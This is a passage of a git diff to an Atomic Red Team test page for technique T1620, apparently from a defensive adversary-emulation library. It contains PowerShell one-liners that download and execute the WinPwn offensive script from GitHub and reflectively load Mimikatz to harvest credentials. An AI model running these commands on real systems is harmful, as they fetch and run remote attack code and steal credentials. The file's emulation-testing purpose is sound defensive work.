net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') GPORemoteAccessPolicy -consoleoutput -noninteractive ``` diff --git a/atomics/T1620/T1620.md b/atomics/T1620/T1620.md index 56bfa321..a1f93eea 100644 --- a/atomics/T1620/T1620.md +++ b/atomics/T1620/T1620.md @@ -30,7 +30,6 @@ Reflectively load Mimik@tz into memory technique via function of WinPwn ```powershell -$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') mimiload -consoleoutput -noninteractive ```